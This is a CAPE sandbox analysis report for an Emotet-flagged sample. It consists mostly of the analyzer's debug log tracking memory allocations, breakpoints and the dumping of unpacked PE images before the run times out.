CAPE

Detections: Emotet


Analysis

Category: FILE
Package: Extraction
Started: 2019-10-10 01:01:37
Completed: 2019-10-10 01:06:23
Duration: 286 seconds

  • Info: The analysis hit the critical timeout, terminating.

Options:
route = internet
procdump = 0

Log:
2019-10-10 02:01:37,000 [root] INFO: Date set to: 10-10-19, time set to: 01:01:37, timeout set to: 200
2019-10-10 02:01:37,015 [root] DEBUG: Starting analyzer from: C:\esgppejl
2019-10-10 02:01:37,015 [root] DEBUG: Storing results at: C:\QegxeawP
2019-10-10 02:01:37,015 [root] DEBUG: Pipe server name: \\.\PIPE\eKzZugK
2019-10-10 02:01:37,015 [root] INFO: Analysis package "Extraction" has been specified.
2019-10-10 02:01:37,421 [root] DEBUG: Started auxiliary module Browser
2019-10-10 02:01:37,421 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 02:01:37,421 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 02:01:37,825 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-10-10 02:01:37,825 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 02:01:37,825 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Human
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 02:01:37,858 [root] DEBUG: Started auxiliary module Usage
2019-10-10 02:01:37,858 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-10-10 02:01:37,858 [root] INFO: Analyzer: DLL_64 set to Extraction_x64.dll from package modules.packages.Extraction
2019-10-10 02:01:37,888 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe" with arguments "" with pid 1964
2019-10-10 02:01:37,888 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:37,888 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\JpZrOO.dll, loader C:\esgppejl\bin\GwzPaJk.exe
2019-10-10 02:01:37,904 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:37,904 [root] DEBUG: Loader: Injecting process 1964 (thread 420) with C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:37,904 [root] DEBUG: Process image base: 0x00400000
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 02:01:37,904 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:37,904 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:37,904 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1964
2019-10-10 02:01:39,917 [lib.api.process] INFO: Successfully resumed process with pid 1964
2019-10-10 02:01:39,917 [root] INFO: Added new process to list with pid: 1964
2019-10-10 02:01:40,009 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:40,009 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:40,119 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,119 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-10-10 02:01:40,119 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x280000
2019-10-10 02:01:40,119 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:40,119 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 1964 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 02:01:40,119 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe".
2019-10-10 02:01:40,119 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7dd3, Entropy 4.831530e+00
2019-10-10 02:01:40,119 [root] DEBUG: AddTrackedRegion: Region at 0x00400000 size 0x1000 added to tracked regions.
2019-10-10 02:01:40,119 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:40,119 [root] INFO: Monitor successfully loaded in process with pid 1964.
2019-10-10 02:01:40,165 [root] DEBUG: Allocation: 0x00350000 - 0x00360000, size: 0x10000, protection: 0x40.
2019-10-10 02:01:40,165 [root] DEBUG: AddTrackedRegion: Region at 0x00350000 size 0x10000 added to tracked regions.
2019-10-10 02:01:40,165 [root] DEBUG: ActivateBreakpoints: TrackedRegion->AllocationBase: 0x00350000, TrackedRegion->RegionSize: 0x10000, thread 420
2019-10-10 02:01:40,165 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xe0, Size=0x2, Address=0x00350000 and Type=0x1.
2019-10-10 02:01:40,165 [root] DEBUG: SetThreadBreakpoint: Set bp 0 thread id 420 type 1 at address 0x00350000, size 2 with Callback 0x747e7700.
2019-10-10 02:01:40,165 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on empty protect address: 0x00350000
2019-10-10 02:01:40,181 [root] DEBUG: SetDebugRegister: Setting breakpoint 1 hThread=0xe0, Size=0x4, Address=0x0035003C and Type=0x1.
2019-10-10 02:01:40,181 [root] DEBUG: SetThreadBreakpoint: Set bp 1 thread id 420 type 1 at address 0x0035003C, size 4 with Callback 0x747e7320.
2019-10-10 02:01:40,181 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on e_lfanew address: 0x0035003C
2019-10-10 02:01:40,181 [root] DEBUG: AllocationHandler: Breakpoints set on newly-allocated executable region at: 0x00350000 (size 0x10000).
2019-10-10 02:01:40,197 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 2 within Context, Size=0x0, Address=0x00350000 and Type=0x0.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x350000: 0xce.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777811 (at 0x0035003C).
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x350000: 0xe8.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x350000: 0xe8.
2019-10-10 02:01:40,197 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777856 (at 0x0035003C).
2019-10-10 02:01:40,197 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,197 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,197 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc775756 (at 0x0035003C).
2019-10-10 02:01:40,213 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,213 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc335756 (at 0x0035003C).
2019-10-10 02:01:40,213 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,213 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x0035003C.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xf6335756 (at 0x0035003C).
2019-10-10 02:01:40,213 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x00350000 already exists for thread 420 (process 1964), skipping.
2019-10-10 02:01:40,213 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x00350000.
2019-10-10 02:01:40,213 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x00350000 (thread 420)
2019-10-10 02:01:40,213 [root] DEBUG: ShellcodeExecCallback: Breakpoint 2 at Address 0x00350000 (allocation base 0x00350000).
2019-10-10 02:01:40,213 [root] DEBUG: ShellcodeExecCallback: Debug: About to scan region for a PE image (base 0x00350000, size 0x10000).
2019-10-10 02:01:40,213 [root] DEBUG: DumpPEsInRange: Scanning range 0x350000 - 0x360000.
2019-10-10 02:01:40,213 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x35053f
2019-10-10 02:01:40,213 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2019-10-10 02:01:40,213 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x0035053F.
2019-10-10 02:01:40,213 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1964_17295749364015104102019
2019-10-10 02:01:40,229 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0xfa00.
2019-10-10 02:01:40,229 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x35073f-0x360000.
2019-10-10 02:01:40,229 [root] DEBUG: ShellcodeExecCallback: PE image(s) detected and dumped.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x350000 - 0x360000.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x00350000.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x0035003C.
2019-10-10 02:01:40,229 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 2 address 0x00350000.
2019-10-10 02:01:40,229 [root] DEBUG: set_caller_info: Adding region at 0x00350000 to caller regions list.
2019-10-10 02:01:40,229 [root] DEBUG: AddTrackedRegion: EntryPoint 0xd1c5, Entropy 5.271777e+00
2019-10-10 02:01:40,229 [root] DEBUG: AddTrackedRegion: Region at 0x00360000 size 0xe200 added to tracked regions.
2019-10-10 02:01:40,229 [root] DEBUG: ProtectionHandler: Address: 0x00361000 (alloc base 0x00360000), NumberOfBytesToProtect: 0xd200, NewAccessProtection: 0x20
2019-10-10 02:01:40,229 [root] DEBUG: ProtectionHandler: New code detected at (0x00360000), scanning for PE images.
2019-10-10 02:01:40,229 [root] DEBUG: DumpPEsInRange: Scanning range 0x360000 - 0x36e200.
2019-10-10 02:01:40,229 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x360000
2019-10-10 02:01:40,229 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00360000
2019-10-10 02:01:40,229 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:01:40,243 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00360000.
2019-10-10 02:01:40,243 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 02:01:40,243 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1964_18180795804011104102019
2019-10-10 02:01:40,243 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xf400.
2019-10-10 02:01:40,243 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x360200-0x36e200.
2019-10-10 02:01:40,243 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x00360000.
2019-10-10 02:01:40,243 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x360000 - 0x36e200.
2019-10-10 02:01:40,243 [root] DEBUG: set_caller_info: Adding region at 0x00360000 to caller regions list.
2019-10-10 02:01:40,243 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 02:01:40,276 [root] INFO: Announced 32-bit process name: ygg9ytft62s5ip.exe pid: 1436
2019-10-10 02:01:40,276 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:01:40,276 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\JpZrOO.dll, loader C:\esgppejl\bin\GwzPaJk.exe
2019-10-10 02:01:40,276 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:01:40,276 [root] DEBUG: Loader: Injecting process 1436 (thread 2924) with C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:40,276 [root] DEBUG: Process image base: 0x00400000
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0049C000 - 0x77110000
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: Allocated 0x200 bytes for new import table at 0x004A0000.
2019-10-10 02:01:40,276 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:01:40,276 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\JpZrOO.dll.
2019-10-10 02:01:40,276 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1436
2019-10-10 02:01:40,290 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1964).
2019-10-10 02:01:40,290 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 02:01:40,290 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1964).
2019-10-10 02:01:40,290 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:01:40,290 [root] INFO: Notified of termination of process with pid 1964.
2019-10-10 02:01:40,290 [root] DEBUG: Process dumps disabled.
2019-10-10 02:01:40,306 [root] INFO: Disabling sleep skipping.
2019-10-10 02:01:40,306 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:01:40,322 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-10-10 02:01:40,338 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x4a0000
2019-10-10 02:01:40,338 [root] DEBUG: Debugger initialised.
2019-10-10 02:01:40,338 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 1436 at 0x747e0000, image base 0x400000, stack from 0x186000-0x190000
2019-10-10 02:01:40,338 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\--400e05c0.
2019-10-10 02:01:40,354 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7dd3, Entropy 4.831530e+00
2019-10-10 02:01:40,354 [root] DEBUG: AddTrackedRegion: Region at 0x00400000 size 0x1000 added to tracked regions.
2019-10-10 02:01:40,368 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:01:40,368 [root] INFO: Added new process to list with pid: 1436
2019-10-10 02:01:40,368 [root] INFO: Monitor successfully loaded in process with pid 1436.
2019-10-10 02:01:40,400 [root] DEBUG: Allocation: 0x01DA0000 - 0x01DB0000, size: 0x10000, protection: 0x40.
2019-10-10 02:01:40,400 [root] DEBUG: AddTrackedRegion: Region at 0x01DA0000 size 0x10000 added to tracked regions.
2019-10-10 02:01:40,400 [root] DEBUG: ActivateBreakpoints: TrackedRegion->AllocationBase: 0x01DA0000, TrackedRegion->RegionSize: 0x10000, thread 2924
2019-10-10 02:01:40,400 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xd0, Size=0x2, Address=0x01DA0000 and Type=0x1.
2019-10-10 02:01:40,400 [root] DEBUG: SetThreadBreakpoint: Set bp 0 thread id 2924 type 1 at address 0x01DA0000, size 2 with Callback 0x747e7700.
2019-10-10 02:01:40,400 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on empty protect address: 0x01DA0000
2019-10-10 02:01:40,400 [root] DEBUG: SetDebugRegister: Setting breakpoint 1 hThread=0xd0, Size=0x4, Address=0x01DA003C and Type=0x1.
2019-10-10 02:01:40,400 [root] DEBUG: SetThreadBreakpoint: Set bp 1 thread id 2924 type 1 at address 0x01DA003C, size 4 with Callback 0x747e7320.
2019-10-10 02:01:40,400 [root] DEBUG: ActivateBreakpoints: Set write breakpoint on e_lfanew address: 0x01DA003C
2019-10-10 02:01:40,400 [root] DEBUG: AllocationHandler: Breakpoints set on newly-allocated executable region at: 0x01DA0000 (size 0x10000).
2019-10-10 02:01:40,400 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-10-10 02:01:40,400 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 2924)
2019-10-10 02:01:40,415 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x01DA0000.
2019-10-10 02:01:40,415 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 2 within Context, Size=0x0, Address=0x01DA0000 and Type=0x0.
2019-10-10 02:01:40,415 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1da0000: 0xce.
2019-10-10 02:01:40,415 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,431 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x74DBAE7A (thread 2924)
2019-10-10 02:01:40,431 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,431 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777811 (at 0x01DA003C).
2019-10-10 02:01:40,431 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,431 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,431 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,477 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x01DA0000.
2019-10-10 02:01:40,477 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1da0000: 0xe8.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,493 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x01DA0000.
2019-10-10 02:01:40,493 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x1da0000: 0xe8.
2019-10-10 02:01:40,493 [root] DEBUG: BaseAddressWriteCallback: Exec bp set on tracked region protect address.
2019-10-10 02:01:40,509 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,509 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,509 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc777856 (at 0x01DA003C).
2019-10-10 02:01:40,509 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,509 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,525 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,525 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,525 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc775756 (at 0x01DA003C).
2019-10-10 02:01:40,525 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,540 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xdc335756 (at 0x01DA003C).
2019-10-10 02:01:40,540 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,540 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x004034CF (thread 2924)
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: Breakpoint 1 at Address 0x01DA003C.
2019-10-10 02:01:40,540 [root] DEBUG: PEPointerWriteCallback: candidate pointer to PE header too big: 0xf6335756 (at 0x01DA003C).
2019-10-10 02:01:40,555 [root] DEBUG: ContextSetThreadBreakpoint: An identical breakpoint (2) at 0x01DA0000 already exists for thread 2924 (process 1436), skipping.
2019-10-10 02:01:40,555 [root] DEBUG: PEPointerWriteCallback: set write bp on AddressOfEntryPoint at 0x01DA0000.
2019-10-10 02:01:40,555 [root] DEBUG: CAPEExceptionFilter: breakpoint hit by instruction at 0x01DA0000 (thread 2924)
2019-10-10 02:01:40,555 [root] DEBUG: ShellcodeExecCallback: Breakpoint 2 at Address 0x01DA0000 (allocation base 0x01DA0000).
2019-10-10 02:01:40,555 [root] DEBUG: ShellcodeExecCallback: Debug: About to scan region for a PE image (base 0x01DA0000, size 0x10000).
2019-10-10 02:01:40,555 [root] DEBUG: DumpPEsInRange: Scanning range 0x1da0000 - 0x1db0000.
2019-10-10 02:01:40,555 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1da053f
2019-10-10 02:01:40,555 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2019-10-10 02:01:40,555 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x01DA053F.
2019-10-10 02:01:40,572 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1436_2166171764015104102019
2019-10-10 02:01:40,572 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0xfa00.
2019-10-10 02:01:40,572 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1da073f-0x1db0000.
2019-10-10 02:01:40,572 [root] DEBUG: ShellcodeExecCallback: PE image(s) detected and dumped.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x1da0000 - 0x1db0000.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x01DA0000.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x01DA003C.
2019-10-10 02:01:40,588 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 2 address 0x01DA0000.
2019-10-10 02:01:40,588 [root] DEBUG: set_caller_info: Adding region at 0x01DA0000 to caller regions list.
2019-10-10 02:01:40,588 [root] DEBUG: AddTrackedRegion: EntryPoint 0xd1c5, Entropy 5.294979e+00
2019-10-10 02:01:40,588 [root] DEBUG: AddTrackedRegion: Region at 0x01DB0000 size 0xe200 added to tracked regions.
2019-10-10 02:01:40,588 [root] DEBUG: ProtectionHandler: Address: 0x01DB1000 (alloc base 0x01DB0000), NumberOfBytesToProtect: 0xd200, NewAccessProtection: 0x20
2019-10-10 02:01:40,602 [root] DEBUG: ProtectionHandler: New code detected at (0x01DB0000), scanning for PE images.
2019-10-10 02:01:40,602 [root] DEBUG: DumpPEsInRange: Scanning range 0x1db0000 - 0x1dbe200.
2019-10-10 02:01:40,602 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1db0000
2019-10-10 02:01:40,602 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x01DB0000
2019-10-10 02:01:40,602 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:01:40,618 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x01DB0000.
2019-10-10 02:01:40,618 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000D1C5.
2019-10-10 02:01:40,930 [root] INFO: Process with pid 1964 has terminated
2019-10-10 02:01:41,086 [root] INFO: Added new CAPE file to list with path: C:\QegxeawP\CAPE\1436_1382759474011104102019
2019-10-10 02:01:41,134 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xf400.
2019-10-10 02:01:41,134 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1db0200-0x1dbe200.
2019-10-10 02:01:41,148 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x01DB0000.
2019-10-10 02:01:41,164 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x1db0000 - 0x1dbe200.
2019-10-10 02:01:41,164 [root] DEBUG: set_caller_info: Adding region at 0x01DB0000 to caller regions list.
2019-10-10 02:01:47,374 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 02:01:47,404 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-10-10 02:01:47,467 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 02:01:47,483 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 02:01:47,483 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
